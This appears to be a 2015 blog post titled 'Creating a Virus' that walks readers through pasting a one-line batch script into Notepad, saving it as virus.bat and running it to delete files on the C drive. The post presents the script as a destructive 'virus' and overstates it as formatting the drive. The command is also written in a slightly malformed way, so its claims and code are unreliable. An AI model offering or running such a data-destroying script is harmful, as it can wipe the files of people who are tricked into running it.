Translate

पृष्ठ

Friday, May 15, 2015

Creating a Virus


In this trick we will be creating a virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. Opening this file we delete or format C drive of your computer.

 !! Attention!! Open this virus take your won risk. This is crash your windows.

1. Open Notepad.
2. Copy and Paste this code.

@Echo off
Del C:\ *.* |y


3. Save this file as virus.bat (Name can be anything but ".bat" is important)]
4. It's ready far run.

No comments:

Post a Comment